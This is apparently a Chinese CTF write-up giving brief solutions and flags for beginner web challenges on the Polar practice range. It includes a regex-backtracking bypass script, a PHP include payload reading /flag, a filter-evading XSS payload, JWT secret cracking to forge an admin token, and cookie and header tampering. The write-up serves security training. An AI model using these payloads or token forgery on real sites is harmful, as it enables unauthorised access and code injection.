目录
想要看详细解题过程的去看【WEB】[Polar靶场] 简单 详细笔记
@swp
访问/.index.php.swp
利用回溯限制用python发送post请求
import requests
url='http://f7587f00-8a64-4c49-ba2a-bfcd26f4738a.www.polarctf.com:8090/'
date={'xdmtql': 'sys nb'+'a'*1000000}
result=requests.post(url,data=date)
print(result.content)
flag{4560b3bfea9683b050c730cd72b3a099}
@rce
get请求 ?sys=include'/flag';
post请求 yyds=666
flag{j6856fd063f0a04874311187da1191h6}
@蜜雪冰城吉警店
更改前端代码,把一个数字改成9,然后点击更改后的奶茶
flag{7d43cc8863ad0ee649048e562fde53ec}
@召唤神龙
访问/main.js
发现这是jsfuck编码
flag{fdf9a88ec4fdd9e3dedaafeece5cc248}
@seek flag
访问/robots.txt可以得到一部分
查看标头可以得到一部分
将cookie中的id改为1可以得到一部分
flag{7ac5b3ca8737a70f029dc0ad71dadd11}
以上5个题没看懂的看这个【WEB】[Polar靶场] 简单 1-5题 详细笔记 -CSDN博客
@jwt
随便注册一个账号,登录,查看cookie中的jwt
将jwt解码
用jwtcrack工具爆破出密钥
输入密钥,把username改成admin,然后点击编码
用编码后的jwt替换原来的jwt
flag{ec39c705cfb5295f9dddcedc819a1659}
@login
从20200102开始,每次提交都会显示一个字符
flag{dlcg}
@iphone
把User-Agent改成
Mozilla/5.0 (iPhone; CPU iPhone OS 16_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1
flag{ba4c2f175f0dba2f2974e676c6dfbbab}
@浮生日记
想办法弹个窗
"><sscriptcript>alert(1)</sscriptcript>
flag{747b11f075d2f6f0d599058206190e27}
@$$
利用超全局变量GLOBALS
flag{9f8a2133f0cad361ff6d22a445c2531a}
持续更新中......